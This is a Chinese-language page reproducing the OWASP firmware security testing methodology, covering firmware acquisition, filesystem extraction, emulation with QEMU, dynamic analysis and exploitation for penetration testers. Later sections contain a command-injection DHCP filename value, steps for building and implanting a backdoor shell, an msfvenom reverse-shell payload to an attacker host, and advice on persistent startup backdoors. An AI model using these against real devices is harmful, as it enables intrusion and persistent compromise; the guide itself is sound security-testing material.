OWASP固件安全性测试指南
OWASP固件安全性测试指南
前景
我们基于 FSTM 进行测试流程如下:
id |
阶段 |
描述 |
1 |
信息收集 |
固件的相关技术文档的详细使用说明 |
2 |
获取固件 |
使用本文中介绍的多种办法获取固件 |
3 |
分析固件 |
固件的功能、特性 |
4 |
提取文件系统 |
从固件中获取文件系统 |
5 |
分析文件系统内容 |
静态分析提取的文件系统的配置文件和二进制文件中的漏洞 |
6 |
仿真固件 |
模拟固件文件和组件 |
7 |
动态分析 |
根据固件和应用程序接口进行动态测试 |
8 |
运行时分析 |
在设备运行时分析编译的二进制文件 |
9 |
二进制利用 |
利用上述手段发现的漏洞实现命令执行 |
0x01:信息搜集
可搜集与固件相关如下基础信息:
- 基于的CPU架构
- 操作系统平台
- 引导程序配置
- 硬件原理图
- 数据表
- 代码行估计
- 源代码存储库位置
- 第三方组建
- 开源许可证(GPL)
- 变更日志
- FCC ID
- 设计和数据流程图
- 威胁建模
- 渗透测试报告之类
- 一些测试平台的测试(Jira、错误赏金平台 bugcrowd 或 hackerone )
搜集方法:
- 利用开发团队及其内部产品线获取准确和最新的数据,及其项目设计原理和应用的安全设置,进而判断出与安全风险有关的信息和某些特定功能点。
- 开源情报(
OSINT:Open source intelligence
)技术手段来获取数据
在搜集信息中遇到开源软件的处理方式:
- 下载开源软件存储库,并根据代码库执行手动和自动静态分析
- 开源软件有其自身的静态分析工具 ,Example:
- Coverity 对 Das U-Boot进行的分析
- semmle的LGTM对Dropbear的分析:
获取如上信息后便可进行粗略的威胁建模:标识出可攻击功能点和影响范围,方便测试时进行漏洞点的贯穿使用。
0x02:获取固件
- 直接从开发团队、制造商/供应商或用户获取
- 使用制造商提供的项目从头编译
- 从供应商的support网站获取
- 从共享平台(
Dropbox
、box
、Google drive
)根据二进制文件扩展名获取
- 从用户为了解决问题而上传固件到论坛、博客,或官方评论中获取
- 设备更新进行中间人(
MITM
)获取 - 云提供商存储位置(如:
AWS
,全称Amazon Web Services S3 buckets
)下载构建版本 - 通过
UART
、JTAG
、PICit
等直接从硬件中提取 - 嗅探“硬件组件中的串行通信”中的更新服务器请求
- 通过移动应用程序中的硬编码接口
- 将固件从引导加载程序(如:U-boot )转储到闪存或通过tftp的网络转储
- 从主板卸下闪存芯片(如:SPI )或 MCU,以进行离线分析和数据提取
- 需要相应的芯片编辑器来存储 flash/MCU
0x03:分析固件
获取固件后需要分析其特征信息:固件文件类型、潜在的根文件元数据、编译基于的平台,使用 binutils
分析过程如下:
file <bin>stringsstrings -n5 <bin>binwalk <bin>hexdump -C -n 512 <bin> > hexdump.outhexdump -C <bin> | head # might find signatures in header
若使用上述方法未提取出有用信息,可能由于以下原因:
- 二进制文件可能是
Bare Metal
- 二进制文件可能仅适用于带有自定义文件系统的实时操作系统(
RTOS
)平台 - 二进制文件可能是加密的
判断二进制文件是否是加密:
- 通过命令:
binwalk -E <bin>
,判断其熵
- 低熵:不太可能被加密
- 高熵:可能被加密(或以某种方式压缩)
- 也可以使用其他程序或在线程序(如:
binvis
)
0x04:提取文件系统
- 固件:一个二进制文件的压缩包,文件系统是其中的一个组件,存储在二进制文件的特定偏移地址中,且有一定大小。
- 文件系统类型:squashfs , ubifs , romfs , rootfs , jffs2 , yaffs2 , cramfs , initramfs
为了分析固件内部相关文件系统数据、未编译代码和设备配置,需使用以下手动和自动方法提取固件文件系统:
- 偏移量和文件系统大小信息获取:
- 使用hexdump和grep等工具搜索特征信息
- 判断文件系统开始位置,如:Squashfs文件系统
- 通过hexdump查找
"hsqs"
字符串,hexdump -C binary | grep -i 'hsqs'
- 通过hexdump查找
- 使用dd命令将从该地址开始到文件末尾的内容全部转储下来
- dd if=binary bs=1 skip=92588 of=rt-n300-fs
- 通过如上步骤,从二进制文件中获取到文件系统,使用
unsquashfs
查看整个文件系统
- 判断文件系统开始位置,如:Squashfs文件系统
- 使用hexdump和grep等工具搜索特征信息
- binwalk
binwalk -ev <bin>
,提取出的文件保存:_binaryname/filesystemtype/
;- 若是文件的标头没有魔术字节 ,需使用
binwalk
查找文件系统的偏移量,然后从二进制文件中分割压缩的文件系统,最后再手动提取出来。
- 分割
dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs # ordd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs - 提取
For squashfs:unsquashfs dir.squashfsCPIO archive files:cpio -ivd --no-absolute-filenames -F <bin>For jffs2 filesystems:jefferson rootfsfile.jffs2For ubifs filesystems with NAND flash:ubireader_extract_images -u UBI -s <start_offset> <bin>、ubidump.py <bin>
- 分割
0x05:分析文件系统内容
手动分析
静态分析文件系统可从如下方面入手:
- 不安全网络守护程序,如:telnetd(有时会伪装成重命名二进制文件)
- 硬编码凭证(用户名、密码、API密钥、SSH密钥和后门变体)
- 硬编码的API端点和后端服务器详细信息
- 更新可用作入口点的服务器功能
- 查看未编译的代码并启动脚本以执行远程代码
- 提取已编译的二进制文件,使用反汇编程序脱机分析
同时,此过程中分析的结果,可为动态分析做基础准备。
自动分析:firmwalker
firmwalker
分析内容范围如下:
- etc/shadow and etc/passwd
- etc/ssl
- 与 ssl 相关的文件,如:.pem .crt 等
- 搜索配置文件
- 寻找脚本文件
- 搜索其他 .bin 文件
- 查找 admin、password、remote、AWS key 等关键字
- 搜索物联网设备上使用的通用Web服务器
- 搜索常见的二进制文件,如:ssh、tftp、dropbear 等
- 搜索禁止的C函数
- 搜索常见的易受命令注入攻击的功能
- 搜索URL、电子邮件、IP地址
- ...
自动固件分析工具:firmwalker
,Aaron Guzman
在原生代码基础上添加了一些其他的检查,可参照 firmwalker。
案例:在 OWASP IOTGoat 中使用 firewalker分析
firmwalk
分析文件系统需使用绝对路径:
./firmwalker.sh /home/embedos/firmware/_IoTGoat-rpi-2.img.extracted/squashfs-root/
分析结果如下:
分析结果存储在 /data/
目录下的两个文件:firmwalker.txt
和 firmwalkerappsec.txt
,需手动检查这些文件。
自动分析:FACT
FACT 固件分析比较工具包分析内容如下:
- 标识软件组件(如:操作系统、CPU体系结构和第三方组件)及其关联的版本信息
- 从映像中提取固件文件系统
- 检测证书和私钥
- 检测CWE
- 基于提要和签名的漏洞检测
- 基于静态行为分析
- 固件版本和文件的比较(差异)
- 使用QEMU对文件系统中的二进制文件进行用户仿真
- 缓冲区溢出防护机制 NX, DEP, ASLR, stack canaries, RELRO, and FORTIFY_SOURCE
- REST API
- ...
案例:在EmbedOS 中使用FACT分析
cd ~/tools/FACT_coresudo ./start_all_installed_fact_components
浏览器访问:http://127.0.0.1:5000 ,
将固件上传到FACT进行分析(可以将带有文件系统的完整固件)
根据给FACT硬件资源,扫描时间会相应不同
FACT分析结果
二进制文件分析:
- 可使用工具:
IDA Pro
、Ghidra
、Hopper
、Capstone
或binary Ninja
进行分析。
- 使用Ghidra对二进制文件“shellback”的分析如下
- 二进制文件选取及分析内容:可以选择从
FACT
获取的可疑内容,或针对漏洞利用点进行查找分析,如:
- 系统调用、字符串、函数列表、易产生内存损坏,对
system()
或类似函数调用等。
- 系统调用、字符串、函数列表、易产生内存损坏,对
- 分析二进制文件的常见功能点
- 是否启用
Stack canaries
(堆栈保护机制)
readelf -aW bin/*| grep stack_chk_failmips-buildroot-linux-uclibc-objdump -d bin/binary | grep stack_chk_fail - 是否启用
Position-independent executable (PIE)
地址无关可执行文件
- PIE disabled
readelf -h <bin> | grep -q 'Type:[[:space:]]*EXEC' - PIE enabled
readelf -h <bin> | grep 'Type:[[:space:]]*DYN'
- PIE disabled
- DSO(dynamic shared object)动态共享目标文件
readelf -d <bin> | grep -q 'DEBUG' - Symbols 动态链接库和符号
readelf --syms <bin>nm <bin> - 可识别的字符串
- -el 指定 16 位宽的小端字符(如:UTF-16)
- -eb 使用大端
- 将任何大于 16 的 ASCII 字符串打印到 stdout
- -t 将返回文件中字符串的偏移量
- -tx 以十六进制格式返回,-td 以八进制和十进制表示 T-to
- 与十六进制编辑器进行交叉引用,或字符串在文件中的位置
- 是否启用 Non-executable (NX) (应该是一种数据保护 DEP)
readelf -lW bin/<bin>| grep STACK判断堆栈是否可执行,
E
代表可执行:GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
execstack bin/*bin/ashbin/busybox - RELRO ( RELocation Read-Only,只读重定位)(一种用于加强对二进制数据段的保护技术)配置
- 完整 RELRO
readelf -d binary | grep BIND_NOW - 部分 RELRO
readelf -d binary | grep GNU_RELRO
- 完整 RELRO
- 是否启用
- 自动检查上述二进制属性的脚本 checksec.sh,如下示例:
./checksec --file=/home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/bin/busybox./checksec --file=/home/embedos/firmware/_IoTGoat-x86-generic-combined-squashfs.img.extracted/squashfs-root/usr/bin/shellback
对于 Microsoft 二进制文件(EXE、DLL),使用 PESecurity 检查 ASLR
, DEP
, SafeSEH
, StrongNaming
, Authenticode
, Control Flow Guard
和 HighEntropyVA
。
0x06:仿真固件
为了确定及验证上面的详细信息、线索、潜在的漏洞,必需模拟固件及其封装的二进制文件。
如下列出仿真固件的方法:
- 部分仿真(
user mode
)—仿真从固件提取的文件系统中的二进制文件:/usr/bin/shellback
- 完整的系统仿真—完整的固件仿真和利用伪造的
NVRAM
启动配置 - 由于硬件或体系结构的依赖性,
user mode
或system mode
可能无法仿真固件成功。在这种情况下,可以将根文件系统或特定二进制文件传输到与目标固件的架构和字节序匹配的物理设备中进行测试,除了物理设备外,也可以使用与目标固件相同体系结构或字节序的预构件虚拟机。
部分仿真( user mode )
- 获取目标的 CPU 架构和字节序,然后选择适当的 QEMU 仿真二进制文件
- CPU 架构获取:
binwalk -Y <bin>readelf -h <bin>el
代表:little endian
,eb
代表:big endian
- 字节序的获取:
- 使用 binwalk 识别打包的固件二进制文件(不是提取出的文件系统中的二进制文件)
binwalk -Y UPG_ipc8120p-w7-M20-hi3516c-20160328_165229.ov
- 使用 binwalk 识别打包的固件二进制文件(不是提取出的文件系统中的二进制文件)
- CPU 架构获取:
- 确定了 CPU 的体系结构和字节序后,找适用的 QEMU 二进制文件来执行部分仿真(从文件系统中提取出的二进制文件)
- QEMU 二进制文件通常所在目录:
/usr/local/qemu-arch
或/usr/bin/qemu-arch
- 将 QEMU 二进制文件复制到提取的文件系统的根目录中
cd /home/embedos/firmware/_DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted.extracted/squashfs-rootcp /usr/bin/qemu-arm-static . - 执行 ARM 二进制文件(或其他的体系结构)使用 QEMU 和 chroot 进行仿真
sudo chroot . ./qemu-arch <binarytoemulate>
- QEMU 二进制文件通常所在目录:
Example:
- busybox
sudo chroot . ./qemu-arm-static bin/busybox ls
- shellback 开启5515上的侦听服务
sudo chroot . ./qemu-arm-static usr/bin/shellback
使用 netcat 尝试连接该服务
sudo lsof -i :5515nc -nv 127.0.0.1 5515
- MIPS CGI 二进制文件,向该文件发出POST请求
sudo chroot . ./qemu-mips-static -E REQUEST_METHOD="POST" -E REQUEST_URI=<request_uri> -E REMOTE_ADDR=<ip_addr> -E HTTP_COOKIE=<custom_cookie> -g <port> <path to cgi binary>
通过上述手段模拟了目标二进制文件,可以使用其应用程序和网络接口,与其进行交互。
全系统仿真( system mode )
使用自动化工具来进行固件的完整仿真
自动化工具:firmadyne
、固件分析工具包、ARM-X 固件仿真框架,这些工具实质上是 QEMU 和其他环境功能 (如:nvram )的包装器。
- firmware-analysis-toolkit
- armx
- firmadyne
- qltool
需注意:固件中包含不常见的压缩文件系统或不支持的体系结构,可能需要修改这些工具
0x07:动态分析
设备在正常运行或者在仿真环境中运行中的动态测试,此阶段的测试可能会由于项目和访问级别有所差异。
分析手段:
- 篡改引导程序配置
- Web 和 API 测试
- 模糊测试(网络和应用程序服务)
- 使用各种工具集进行的主动扫描以获取提升的访问权限或代码执行
嵌入式Web应用程序测试
检查方向:
- 诊断和故障排除页面可能存在命令注入
- 验证和授权方案对整个固件中的应用程序和操作系统平台的相同框架进行验证
- 默认的用户名、密码
- 在网页执行目录遍历或文件读取,以识别调试或测试功能
- 在 SOAP/XML 和 API 传输中的输入检查 ,如:XSS 和 XXE
- 跟踪观察应用程序中的参数查看异常点和堆栈溢出点
- 常见的 C/C++ 漏洞、常见的嵌入式 Web 应用程序的有效负载,如:内存损坏漏洞、格式字符串缺陷、整数溢出
引导加载程序测试
修改设备的引导加载程序时,可以进行如下操作:
- 在引导过程中加 “0”、空格、或其他标识的“魔术代码”来获取 shell
- 修改配置以执行 shell 命令,如:引导参数末尾 “init=/bin/sh”
#printenv#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh#saveenv#boot
- 设置一个 tftp 服务器,从本地通过网络加载远程图像(前提是设备有网络访问权限)
#setenv ipaddr 192.168.2.2 #local IP of the device#setenv serverip 192.168.2.1 #tftp server IP#saveenv#reset#ping 192.168.2.1 #check if network access is available#tftp ${loadaddr} uImage-3.6.35 #loadaddr takes two arguments: the address to load the file into and the filename of the image on the TFTP server
- 使用 ubootwrite.py 编写 uboot-image 并且安装修改过的固件来获取 root
- 查看启用的调试功能,如:详细记录、加载任意内核、从不受信任的来源引导
- 使用警告:使用引脚连接主板,观察设备启动顺序,在内核解压缩之前,将连接主板的引脚短路或者连接到 SPI 闪存芯片上的数据引脚(DO)
- 使用警告:使用引脚连接主板,观察设备启动顺序,在内核解压缩之前,在 U-boot 对 UBI 映像解压缩时,将连接主板的引脚短路或连接到 NAND 闪存芯片的引脚 8 和 9
- 在短接引脚之前请查看 NAND 闪存芯片的数据表
- 使用恶意参数配置恶意 DHCP 服务器作为设备在 PXE 引导期间提取的输入
- 使用 Metasploit DHCP 辅助服务器,进行命令注入,比如修改参数
FILENAME
为a";/bin/sh;#
,来测试设备启动过程的输入验证
- 使用 Metasploit DHCP 辅助服务器,进行命令注入,比如修改参数
固件完整性测试
尝试上传自定义固件或编译过的二进制文件,来检测完整性或签名验证漏洞。
可设置后门点:启动脚本引用、某些链接、依赖不受信任的安装位置(如:SD 卡)或用位于根文件系统外部存储数据的 flash 的代码时触发。
使用以下步骤编译在启动中的后门 shell :
- 使用固件修改包(
FMK:firmware-tool-kit
)提取固件 - 确定目标固件架构和字节序
- 使用 Buildroot 构件交叉编译器或使用其他适合的环境
- 使用交叉编译器构件后门
- 将后门复制到解压缩的固件
/usr/bin
中 - 将适当的 QEMU 二进制文件复制到固件rootfs
- 使用 chroot 和 QEMU 模拟后门
- 使用 netcat 连接后门
- 从 rootfs 中删除 QEMU 二进制文件
- 使用FMK重新包装修改后的固件
- 使用固件工具分析包( FAT )进行仿真并使用 netcat 连接到目标后门 ip、端口测试后门固件
若在动态分析后,通过操纵引导加载程序或其他的硬件安全测试手段获得了root shell,尝试执行预编译恶意二进制文件(即在二进制文件中植入程序或反向 shell),可通过使用自动化的有效载荷或工具( C&C )框架进行命令执行和控制,比如使用 Metasploit 框架和 msfvenom
,如下是操作步骤:
- 确定目标固件架构和字节序
- 使用 msfvenom 生成有效载荷,-p :payload、攻击者ip:LHOST=、攻击者监听端口:LPORT=、有效载荷的文件类型:-f、结构体系:--arch、平台:--platform linux or windows、输出文件保存:-o
msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
- 将有效载荷传输到受攻击的设备(操作举例:本地运行Web服务器,然后使用
wget/curl
上传到目标文件系统中),确认有效载荷有执行权限 - 使用 Metasploit 接收反弹回的 shell 之前的设备
set payload linux/armle/meterpreter_reverse_tcpset LHOST 192.168.1.245 #attacker host IPset LPORT 445 #can be any unused portset ExitOnSession falseexploit -j -z
- 在受攻击的设备中执行 meterpreter reverse
- 查看 meterpreter sessions
- 进行后渗透
最后,尽可能的在启动脚本中设置对设备持久访问的后门,保证重新启动后也有设备的访问控制权
0x08:运行时分析
设备在正常运行或在仿真环境中运行时,对正在运行的进程或二进制文件进行调试。如下是分析步骤:
sudo chroot . ./qemu-arch -L <optionalLibPath> -g <gdb_port> <binary>
- 使用gdb-multiarch或IDA进行调试
- 为步骤4中的功能点设置断点,如:
memcpy
,strncpy
,strcmp
,等 - 确认漏洞点,比如:通过发送较大的有效载荷来识别溢出或进程崩溃点
一些可能使用的工具:
- gdb-multiarch
- Peda
- Frida
- ptrace
- strace
- IDA Pro
- Ghidra
- Binary Ninja
- Hopper
0x09:漏洞利用
通过上面阶段的测试识别出漏洞之后,需使用PoC在真实环境中进行验证。编写漏洞利用代码需要掌握低级语言(如:ASM、C/C++、shellcode 等)的编程及了解一些目标体系结构(如:MIPS、ARM、x86等)。
在遇到二进制缓解(保护)机制(eg:NX、DEP、ASLR等)时,需要其他技术进行恶意攻击,比如:
- 面向返回的编程:ROP(Return-oriented Programming),ROP 允许攻击者通过链接目标进程或二进制代码中现有的代码实施恶意攻击,利用ROP 的漏洞举例:通过 ROP 链进行缓冲区溢出。可借助工具 Capstone's gadget finder或者 ROPGadget 。
相关方面知识可参考文档:
- https://azeria-labs.com/writing-arm-shellcode/
- https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/
固件和二进制文件分析工具
- Firmware Analysis Comparison Toolkit(FACT)
- FWanalyzer
- Firmwalker
- Firmware Modification Kit
- Firmadyne
- ByteSweep
- Binwalk
- Flashrom
- Openocd
- Angr binary analysis framework
- Binary Analysis Tool
- Checksec.sh
- CHIPSEC
- Qiling Advanced Binary Emulation Framework
- Triton dynamic binary analysis (DBA) framework
用于练习的固件项目
OWASP固件安全性测试指南的更多相关文章
- 安全性测试:OWASP ZAP 2.8 使用指南(四):ZAP扫描移动应用安全
在做移动应用(APP,小程序等)测试时,需要关注应用安全性. ZAP是可以用来进行手机移动应用渗透性测试扫描的. 正因为ZAP是采用“中间代理”的形式,截取并扫描所有客户端与服务器的交互请求,作为客户 ...
- 安全性测试:OWASP ZAP 2.8 使用指南(一):安全测试基础及ZAP下载、安装
概览 本文意在对于OWASP's Zed Attack Proxy(ZAP)软件做一个基本使用指南介绍. ZAP是一个用于实施安全性测试的工具,即使没有很强的安全测试背景也可以很好的使用. 为了达到这 ...
- 安全性测试:OWASP ZAP使用入门指南
免责声明: 本文意在讨论使用工具来应对软件研发领域中,日益增长的安全性质量测试需求.本文涉及到的工具不可被用于攻击目的. 1. 安全性测试 前些天,一则12306用户账号泄露的新闻迅速发酵,引起了购票 ...
- 安全性测试入门:DVWA系列研究(一):Brute Force暴力破解攻击和防御
写在篇头: 随着国内的互联网产业日臻成熟,软件质量的要求越来越高,对测试团队和测试工程师提出了种种新的挑战. 传统的行业现象是90%的测试工程师被堆积在基本的功能.系统.黑盒测试,但是随着软件测试整体 ...
- Web安全测试指南--认证
认证: 5.1.1.敏感数据传输: 编号 Web_Authen_01_01 用例名称 敏感数据传输保密性测试 用例描述 测试敏感数据是否通过加密通道进行传输以防止信息泄漏. 严重级别 高 前置条件 1 ...
- 初识App安全性测试
目前手机App测试还是以发现bug为主,主要测试流程就是服务器接口测试,客户端功能性覆盖,以及自动化配合的性能,适配,压测等,对于App安全性测试貌似没有系统全面统一的标准和流程,其实安全性bug也可 ...
- 《大话移动APP测试:Android与iOS应用测试指南》
<大话移动app测试:android与ios应用测试指南> 基本信息 作者: 陈晔 出版社:清华大学出版社 ISBN:9787302368793 上架时间:2014-7-7 出版日期:20 ...
- 推荐——Monkey《大话 app 测试——Android、iOS 应用测试指南》
<大话移动——Android与iOS应用测试指南> 京东可以预购啦!http://item.jd.com/11495028.html 当当网:http://product.dangdang ...
- Web系统测试Web安全性测试
WEB安全性测试介绍WEB安全性测试--拒绝服务攻击WEB安全性测试--文件上传漏洞WEB安全性测试--跨站攻击WEB安全性测试--SQL注入一WEB安全性测试--SQL注入二WEB安全性测试--SQ ...
随机推荐
- 教你怎么写jQuery的插件
jQuery(以下简称JQ)是一个功能强大而又小巧的JS框架,现在很多网站都在使用JQ,本站也不例外.本文教大家如何写一个属于你自己的JQ插件. 本JQ插件例子是在你网站的文章结尾处添加你的版权. J ...
- electron-updater实现更新electron应用程序
electron-updater实现更新electron应用程序 第一步 安装"electron-updater": "^4.3.5", 打开package.j ...
- git永久保存账号密码,免去git重复输入账号密码操作
这是我刚刚遇到的问题,每次操git操作都要输入用户名和密码,网上百度了下搜到了方法解决了 方法一:(快捷简单) 直接在git bash 中执行命令:git config --global creden ...
- SQL DELETE语句如何让表使用别名的方法
DELETE 别名 FROM 表名称 别名 WHERE 列名称 = 值
- Vue内容
vue中的过滤器 moeths点击 过滤器的含义 过滤器就是把原有的数据过一遍 放到页面中 不会改变原有的数据 只是在原有的数据上增加新的数据
- JDK源码阅读-------自学笔记(二十五)(java.util.Vector 自定义讲解)
Vector 向量 Vector简述 1).Vector底层是用数组实现的List 2).虽然线程安全,但是效率低,所以并不是安全就是好的 3).底层大量方法添加synchronized同步标记,sy ...
- 配置kuernetes集群pod拉取私有镜像仓库中的镜像
目录 1 背景说明 2 实现方法 3 具体实现 配置镜像仓库项目为公开类型(任何人可以访问) 配置docker-registry类型的secret(pod使用secret获取镜像认证) 通过账户名密码 ...
- STM32入门系列-STM32外设地址映射
片上外设区分为四条总线,根据外设速度的不同,不同总线挂载着不同的外设,APB1挂载低速外设,APB2和AHB挂载高速外设.相应总线的最低地址我们称为该总线的基地址,总线基地址也是挂载在该总线上的首个外 ...
- Java学习的第二十天
1.类是单继承的,类是多继承的.. 接口只能继承接口 标识接口没有任何的属性和方法 2.今天没有问题 3.明天学习综合实例和第八章开头部分
- 使用 Iceberg on Kubernetes 打造新一代云原生数据湖
背景 大数据发展至今,按照 Google 2003年发布的<The Google File System>第一篇论文算起,已走过17个年头.可惜的是 Google 当时并没有开源其技术,& ...